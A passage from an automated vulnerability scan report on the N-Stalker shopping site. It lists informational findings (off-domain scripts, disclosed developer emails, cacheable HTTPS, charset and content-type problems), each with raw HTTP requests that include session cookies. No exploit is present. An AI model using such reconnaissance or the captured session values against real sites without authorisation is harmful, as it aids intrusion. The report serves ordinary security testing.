<span id="siteseal"><script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=1MDgOenoax1AHuH9NzXVTSuE8HEpviarFKqwzTHz992u5TVSoPU6kARRO"></script>
...[SNIP]...
<![endif]-->

       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

3.2. https://secure.nstalker.com/shopping/Step1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /shopping/Step1/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /shopping/Step1/ HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://secure.nstalker.com/shopping/
Cache-Control: max-age=0
Origin: https://secure.nstalker.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2
Content-Length: 17

assetProfile_id=1

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:02:50 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.2.12
Pragma: no-cache
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 19619

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <title>N-Sta
...[SNIP]...
<span id="siteseal"><script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=1MDgOenoax1AHuH9NzXVTSuE8HEpviarFKqwzTHz992u5TVSoPU6kARRO"></script>
...[SNIP]...
<![endif]-->

       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

3.3. https://secure.nstalker.com/shopping/Step2/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /shopping/Step2/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /shopping/Step2/ HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://secure.nstalker.com/shopping/Step1/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:04:28 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.2.12
Pragma: no-cache
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 12956

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <title>N-Sta
...[SNIP]...
<![endif]-->

       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

3.4. https://secure.nstalker.com/shopping/Step3/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /shopping/Step3/

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /shopping/Step3/ HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://secure.nstalker.com/shopping/Step2/
Cache-Control: max-age=0
Origin: https://secure.nstalker.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2
Content-Length: 85

cotacao=&atualiza=&apaga=&productID%5B0%5D=31&qtd%5B0%5D=1&qtd%5B0%5D=1&discountCode=

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:04:35 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.2.12
Pragma: no-cache
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 23632

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <title>N-Sta
...[SNIP]...
<![endif]-->

       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

4. Email addresses disclosed  previous  next
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


4.1. https://secure.nstalker.com/js/jquery-bgiframe.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /js/jquery-bgiframe.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery-bgiframe.js HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://secure.nstalker.com/shopping/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:02:42 GMT
Server: Apache
Cache-Control: max-age=7200
Expires: Fri, 31 Dec 2010 17:02:42 GMT
Last-Modified: Thu, 11 Dec 2008 13:46:52 GMT
ETag: "3d4606-12d9-494119cc"
Accept-Ranges: bytes
Content-Length: 4825
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: application/x-javascript

/* Copyright (c) 2006 Brandon Aaron (http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-li
...[SNIP]...
ided so that one could change
*        the src of the iframe to whatever they need.
*        Default: "javascript:false;"
*
* @name bgiframe
* @type jQuery
* @cat Plugins/bgiframe
* @author Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
*/
$.fn.bgIframe = $.fn.bgiframe = function(s) {
   // This is only for IE6
   if ( $.browser.msie && /6.0/.test(navigator.userAgent) ) {
       s = $.extend({
           top : 'auto',
...[SNIP]...

4.2. https://secure.nstalker.com/js/jquery-dimensions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /js/jquery-dimensions.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /js/jquery-dimensions.js HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://secure.nstalker.com/shopping/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:02:42 GMT
Server: Apache
Cache-Control: max-age=7200
Expires: Fri, 31 Dec 2010 17:02:42 GMT
Last-Modified: Thu, 11 Dec 2008 13:46:24 GMT
ETag: "3d4608-dc3-494119b0"
Accept-Ranges: bytes
Content-Length: 3523
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: application/x-javascript

/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $LastCha
...[SNIP]...

4.3. https://secure.nstalker.com/js/jquery-pngFix.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /js/jquery-pngFix.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /js/jquery-pngFix.js HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://secure.nstalker.com/shopping/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:02:42 GMT
Server: Apache
Cache-Control: max-age=7200
Expires: Fri, 31 Dec 2010 17:02:42 GMT
Last-Modified: Wed, 10 Dec 2008 20:17:59 GMT
ETag: "3d460d-1255-494023f7"
Accept-Ranges: bytes
Content-Length: 4693
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: application/x-javascript

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.1, 11.09.2007
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*
* Changelog:
* 11.09.2007 Version 1.1
* - removed noConflict
* - added png-support for input type=image
* - 01.08.2007 CSS background-image support extension added by Scott Jehl, scott@filamentgroup.com, http://www.filamentgroup.com
* 31.05.2007 initial Version 1.0
* --------------------------------------------------------------------
* @example $(function(){$(document).pngFix();});
* @des
...[SNIP]...

5. Cacheable HTTPS response  previous  next
There are 2 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


5.1. https://secure.nstalker.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:03:10 GMT
Server: Apache
Cache-Control: max-age=0
Expires: Fri, 31 Dec 2010 15:03:10 GMT
Last-Modified: Tue, 03 Feb 2009 02:21:15 GMT
ETag: "1f81e6-ebe-4987aa1b"
Accept-Ranges: bytes
Content-Length: 3774
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: text/plain

......00..............(...0...`............
............................................................................
.......................!...#...&...)...,.../...2...5...8...<...>...@...C...D...
...[SNIP]...

5.2. https://secure.nstalker.com/shopping/Step1/getDesc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /shopping/Step1/getDesc.php

Request

POST /shopping/Step1/getDesc.php HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://secure.nstalker.com/shopping/Step1/
Origin: https://secure.nstalker.com
USER_AGENT: XMLHttpRequest
Method: POST https://secure.nstalker.com/shopping/Step1/getDesc.php HTTP/1.1
XUSER_AGENT: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2
Content-Length: 7

desc=27

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:03:03 GMT
Server: Apache
Cache-Control: max-age=0
Expires: Fri, 31 Dec 2010 15:03:03 GMT
X-Powered-By: PHP/5.2.12
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 217

N-Stalker Web Application Security Scanner 2009 - Enterprise Edition. Single Website License (Allow to scan 1 URL with a nominated IP Address). Perpetual License with WSI Maintenance Service (upgrades
...[SNIP]...

6. HTML does not specify charset  previous  next
There are 2 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


6.1. https://secure.nstalker.com/shopping/Step1/getDesc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /shopping/Step1/getDesc.php

Request

POST /shopping/Step1/getDesc.php HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://secure.nstalker.com/shopping/Step1/
Origin: https://secure.nstalker.com
USER_AGENT: XMLHttpRequest
Method: POST https://secure.nstalker.com/shopping/Step1/getDesc.php HTTP/1.1
XUSER_AGENT: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2
Content-Length: 7

desc=27

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:03:03 GMT
Server: Apache
Cache-Control: max-age=0
Expires: Fri, 31 Dec 2010 15:03:03 GMT
X-Powered-By: PHP/5.2.12
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 217

N-Stalker Web Application Security Scanner 2009 - Enterprise Edition. Single Website License (Allow to scan 1 URL with a nominated IP Address). Perpetual License with WSI Maintenance Service (upgrades
...[SNIP]...

6.2. https://secure.nstalker.com/shopping/buy_add_to_cart_special.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.nstalker.com
Path:   /shopping/buy_add_to_cart_special.php

Request

POST /shopping/buy_add_to_cart_special.php HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://secure.nstalker.com/shopping/Step1/
Cache-Control: max-age=0
Origin: https://secure.nstalker.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2
Content-Length: 48

oferta%5B0%5D=1&oferta%5B1%5D=31&oferta%5B2%5D=0

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:03:09 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Powered-By: PHP/5.2.12
Pragma: no-cache
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 49

<script>top.location='/shopping/Step1/';</script>

7. Content type incorrectly stated  previous
There are 2 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


7.1. https://secure.nstalker.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.nstalker.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:03:10 GMT
Server: Apache
Cache-Control: max-age=0
Expires: Fri, 31 Dec 2010 15:03:10 GMT
Last-Modified: Tue, 03 Feb 2009 02:21:15 GMT
ETag: "1f81e6-ebe-4987aa1b"
Accept-Ranges: bytes
Content-Length: 3774
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: text/plain

......00..............(...0...`............
............................................................................
.......................!...#...&...)...,.../...2...5...8...<...>...@...C...D...
...[SNIP]...

7.2. https://secure.nstalker.com/shopping/Step1/getDesc.php  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.nstalker.com
Path:   /shopping/Step1/getDesc.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /shopping/Step1/getDesc.php HTTP/1.1
Host: secure.nstalker.com
Connection: keep-alive
Referer: https://secure.nstalker.com/shopping/Step1/
Origin: https://secure.nstalker.com
USER_AGENT: XMLHttpRequest
Method: POST https://secure.nstalker.com/shopping/Step1/getDesc.php HTTP/1.1
XUSER_AGENT: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=110516122.955118389.1293807698.1293807698.1293807698.1; __utmc=110516122; __utmz=110516122.1293807698.1.1.utmccn=(organic)|utmcsr=google|utmctr=n-stalker|utmcmd=organic; __utmb=110516122; PHPSESSID=da7efad5d69bbec2cd726ec4756eabf2
Content-Length: 7

desc=27

Response

HTTP/1.1 200 OK
Date: Fri, 31 Dec 2010 15:03:03 GMT
Server: Apache
Cache-Control: max-age=0
Expires: Fri, 31 Dec 2010 15:03:03 GMT
X-Powered-By: PHP/5.2.12
Keep-Alive: timeout=20, max=300
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 217

N-Stalker Web Application Security Scanner 2009 - Enterprise Edition. Single Website License (Allow to scan 1 URL with a nominated IP Address). Perpetual License with WSI Maintenance Service (upgrades
...[SNIP]...

Report generated by XSS.CX at Fri Dec 31 09:51:13 CST 2010.